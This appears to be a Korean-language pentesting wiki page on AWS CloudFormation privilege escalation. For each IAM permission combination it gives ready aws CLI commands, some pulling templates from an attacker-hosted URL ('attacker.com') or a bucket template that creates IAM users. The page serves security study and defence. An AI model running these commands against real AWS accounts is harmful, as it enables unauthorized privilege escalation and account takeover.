AWS - Cloudformation Privesc

cloudformation

cloudformation에 대한 자세한 정보는 다음을 확인하세요:

iam:PassRole, cloudformation:CreateStack

이 권한을 가진 공격자는 CloudFormation 스택을 자신이 호스팅하는 서버에 있는 사용자 정의 템플릿으로 작성하여 지정된 역할의 권한으로 작업을 실행할 수 있습니다:

aws cloudformation create-stack --stack-name <stack-name> \
--template-url http://attacker.com/attackers.template \
--role-arn <arn-role>

다음 페이지에는 추가 권한 **cloudformation:DescribeStacks**가 있는 익스플로잇 예제가 있습니다:

잠재적 영향: 지정된 cloudformation 서비스 역할로의 권한 상승.

iam:PassRole, (cloudformation:UpdateStack | cloudformation:SetStackPolicy)

이 경우 기존 cloudformation 스택을 악용하여 업데이트하고 이전 시나리오처럼 권한을 상승시킬 수 있습니다:

aws cloudformation update-stack \
--stack-name privesc \
--template-url https://privescbucket.s3.amazonaws.com/IAMCreateUserTemplate.json \
--role arn:aws:iam::91029364722:role/CloudFormationAdmin2 \
--capabilities CAPABILITY_IAM \
--region eu-west-1

cloudformation:SetStackPolicy 권한은 스택에 대한 UpdateStack 권한을 부여하고 공격을 수행하는 데 사용할 수 있습니다.

잠재적 영향: 지정된 cloudformation 서비스 역할에 대한 권한 상승.

cloudformation:UpdateStack | cloudformation:SetStackPolicy

이 권한이 있지만 iam:PassRole이 없는 경우에도 사용된 스택을 업데이트하고 이미 연결된 IAM 역할을 악용할 수 있습니다. 이전 섹션에서 exploit 예제를 확인하세요 (업데이트에서 역할을 지정하지 마세요).

cloudformation:SetStackPolicy 권한은 스택에 대한 UpdateStack 권한을 부여하고 공격을 수행하는 데 사용할 수 있습니다.

잠재적 영향: 이미 연결된 cloudformation 서비스 역할에 대한 권한 상승.

iam:PassRole,((cloudformation:CreateChangeSet, cloudformation:ExecuteChangeSet) | cloudformation:SetStackPolicy)

역할을 전달하고 ChangeSet을 생성 및 실행할 수 있는 권한이 있는 공격자는 새 cloudformation 스택을 생성/업데이트하고 cloudformation 서비스 역할을 악용할 수 있습니다. CreateStack 또는 UpdateStack과 마찬가지입니다.

다음 exploit는 ChangeSet 권한을 사용하여 스택을 생성하는 CreateStack 변형입니다.

aws cloudformation create-change-set \
--stack-name privesc \
--change-set-name privesc \
--change-set-type CREATE \
--template-url https://privescbucket.s3.amazonaws.com/IAMCreateUserTemplate.json \
--role arn:aws:iam::947247140022:role/CloudFormationAdmin \
--capabilities CAPABILITY_IAM \
--region eu-west-1

echo "Waiting 2 mins to change the stack"
sleep 120

aws cloudformation execute-change-set \
--change-set-name privesc \
--stack-name privesc \
--region eu-west-1

echo "Waiting 2 mins to execute the stack"
sleep 120

aws cloudformation describe-stacks \
--stack-name privesc \
--region eu-west-1

cloudformation:SetStackPolicy 권한을 사용하여 스택에 대한 ChangeSet 권한을 부여하고 공격을 수행할 수 있습니다.

잠재적 영향: cloudformation 서비스 역할에 대한 권한 상승.

(cloudformation:CreateChangeSet, cloudformation:ExecuteChangeSet) | cloudformation:SetStackPolicy)

이 방법은 IAM 역할을 전달하지 않고 이전 방법과 유사하므로, 이미 연결된 역할을 악용할 수 있으며, 매개변수만 수정하면 됩니다:

--change-set-type UPDATE

잠재적 영향: 이미 연결된 cloudformation 서비스 역할로의 권한 상승.

iam:PassRole,(cloudformation:CreateStackSet | cloudformation:UpdateStackSet)

공격자는 이러한 권한을 악용하여 StackSets를 생성/업데이트하여 임의의 cloudformation 역할을 악용할 수 있습니다.

잠재적 영향: cloudformation 서비스 역할로의 권한 상승.

cloudformation:UpdateStackSet

공격자는 passRole 권한 없이 이 권한을 악용하여 StackSets를 업데이트하고 연결된 cloudformation 역할을 악용할 수 있습니다.

잠재적 영향: 연결된 cloudformation 역할로의 권한 상승.

참조

• https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/